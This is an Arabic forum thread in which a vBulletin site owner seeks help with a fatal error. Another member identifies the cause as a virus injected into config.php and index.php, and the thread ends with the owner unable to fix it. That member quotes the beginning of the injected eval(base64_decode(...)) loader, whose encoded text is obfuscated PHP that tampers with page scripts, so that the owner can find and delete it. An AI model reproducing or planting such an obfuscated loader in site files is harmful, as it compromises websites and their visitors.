اخوتي حصلت مشكلة عندي المنتدي لا يفتح ويظهر لي هذا ارجوا المساعدة

salamat

عضو جديد
25 مارس 2009
195
0
0
اخوتي حصلت مشكلة عندي المنتدي لا يفتح ويظهر لي هذا ارجوا المساعدة

Fatal error: Cannot redeclare gwt57() (previously declared in /home1/salamat1/public_html/vb/index.php(1) : eval()'d code:1) in /home1/salamat1/public_html/vb/includes/config.php(1) : eval()'d code on line 1

ارجوا المساعدة اخوي الله يبارك فية

محمد84

:: عضو مميز ::
20 فبراير 2009
2,925
8
0
www.facebook.com
هذا كود فايروس يصيب الملفات .
توّهـ منتشر هاليومين ..
روح لملف الكونفق ونزله بالفرونت بيج او اي محرر ..

راح تشاهد باوله كود غريب مثل هالكود :

كود:
*<?php eval(base64_decode('aWYoIWlzc2V0KCRlOTV3MSkpe2Z1bm N0aW9uIGU5NXcoJHMpe2lmKHByZWdfbWF0Y2hfYWxsKCcjPHNj cmlwdCguKj8pPC9zY3JpcHQ+I2lzJywkcywkYSkpZm9yZWFjaC gkYVswXSBhcyAkdilpZihjb3VudChleHBsb2RlKCJcbiIsJHYp KT41KXskZT1wcmVnX21hdGNoKCcjW1wnIl1bXlxzXCciXC4sO1 w/IVxbXF06Lzw+XChcKV17MzAsfSMnLCR2KXx8cHJlZ19tYXRjaC gnI1tcKFxbXShccypcZCssKXsyMCx9IycsJHYpO2lmKChwcmVn X21hdGNoKCcjXGJldmFsXGIjJywkdikmJigkZXx8c3

حدده واحذفه

او اعمل ملف كونج جديد (نضيف) ورفعو

salamat

عضو جديد
25 مارس 2009
195
0
0
اخي محمد ممكن تساعدني في ذالك لاني لم استطيع حل هذة المشكلة

محمد84

20 فبراير 2009
2,925
8
0
www.facebook.com
اخي سلامات

عدل ملف config.php جديد

وارفعو لمجلد includes

على هذا المسار

vb/includes/config.php

والله الموفق

salamat

عضو جديد
25 مارس 2009
195
0
0
المسار واضح جدا ولكن لا اعرف كيف اعمل وكيف الغي ما جاء في الكود الغريب او احدده واحذفه او اعمل ملف كونج جديد (نضيف) ورفعو
تقدر تساعدني فيها انت يا اخي محمد وتعملها بنفسك بدلا مني لاني تعبت من هذة المشكلة منذ اسبوع الي الان

محمد84

20 فبراير 2009
2,925
8
0
www.facebook.com
اهلا اخي سلامات

شوف الشرح في الصورةد

1- اسم قاعدة البيانات

وعموما يكون اسمها هكذا مثلا = lpha_13234567_vb

2-البريد الالكتروني وهو خاص بالمنتدى وليس المدير

3- اسم المستخدم مثلا = sql303.lpha.com

4- اسم اليوزر مثلا = lpha_13234567

5- الباسوورد = هو الكود اللي تدخل به على السي بانل

....

والله الموفق

salamat

عضو جديد
25 مارس 2009
195
0
0
اهلا يا اخي محمد
استطيع الدخول الي السي بانال عادي واستطيع ان اري الكوفنح ولكن لا اعرف كيف اتعامل معة
وتعاملي مع السي بانال محدود استطيع مثلا ان اركب استايل جديد للمنتدي اغير الباسورد اعمل ايميل للمنتدي وعملتة غير ذالك لا
المشكلة هنا هو هذا الفايرس الذي تحدثت عنة وقالة لي صديق لي وهو ياعدني في ان يرجع المنتدي ولكن هي اعة او اتنين ويرجع الوضع كما كان ويظهر لي هذا مرة اخري

Fatal error: Cannot redeclare xfz69() (previously declared in /home1/salamat1/public_html/vb/index.php(1) : eval()'d code:1) in /home1/salamat1/public_html/vb/includes/config.php(1) : eval()'d code on line 1

salamat

عضو جديد
25 مارس 2009
195
0
0
مستضيفي هو hostmonster.com
وماذا اقول لة بالضبط كي يفهم الحكاية لان هناك اكيد مصطلحات تعرفها اكثر مني

محمد84

20 فبراير 2009
2,925
8
0
www.facebook.com
قلو انو منتداك لا يفتح

وتظهر هذه الرسالة

Fatal error: Cannot redeclare gwt57() (previously declared in /home1/salamat1/public_html/vb/index.php(1) : eval()'d code:1) in /home1/salamat1/public_html/vb/includes/config.php(1) : eval()'d code on line 1

وهو يعمل اللي واجب عليه

salamat

عضو جديد
25 مارس 2009
195
0
0
ارسلت لهم وانتظر الرد
ولكن انت لا تستطيع فعل هذا كما ذكرت لي ؟
ولي سؤال اليس من المفروض ان يكون هناك برنامج حماية انتي فايرس للوحة التحكم ام لا ؟
وهل اطلبها منهم ام سيكون طلب غريب ؟

salamat

عضو جديد
25 مارس 2009
195
0
0
اخي محمد ما رايك في هذا الرد وماذا افعل الان​

Dear Customer,

Unfortunately the "Fatal error: Cannot redeclare xfz69() (previously declared in /home1/salamat1/public_html/vb/index.php(1) : eval()'d code:1) in /home1/salamat1/public_html/vb/includes/config.php(1) : eval()'d code on line 1" message you provided is indicating a coding issue with the software you are using. Unfortunately we are unable to provide any direct support on the coding/scripting/ or design of your website. You will need to contact the developer of the web software you are using for assistance with the error message you are receiving.

You will also need to contact a web developer for any help regarding securing your website as this coincides with the coding/scripting/design of your website.

Thank you,
Casey​

محمد84

20 فبراير 2009
2,925
8
0
www.facebook.com
على حسب ما اشوف ما يقدرو يحلو المشكلة

وهذه من شروط الخدمة عندهم

ما عليك إلا عمل اللي سبق و وضعتلك شرح والله الموفق

salamat

عضو جديد
25 مارس 2009
195
0
0
اخي محمد لا استطيع ان اراسلك علي الخاص
وسؤالي الاخير لك في هذا الموضوع
هل تستطيع ان تساعدني بنفسك وتحل هذة المشكلة وتدخل الي السي بانل عندي وتحذف الفايرس لكي يعود المنتدي كما كان ام لا ؟
الحكاية لن تستغرق منك اكثر من دقائق وتحل مشكلة المنتدي الموجودة منذ اسبوع الي الان
فاذا كان عندك استعداد فشكرا لك وانا في انتظار ردك ومعرفة طريقة المراسلة بيننا
وشكرا لك سواء قبلت ام رفضت

salamat

عضو جديد
25 مارس 2009
195
0
0
بسم الله ولا حول ولا قوة إلا بالله العلي العظيم

LOVEDARK

عضو جديد
9 سبتمبر 2008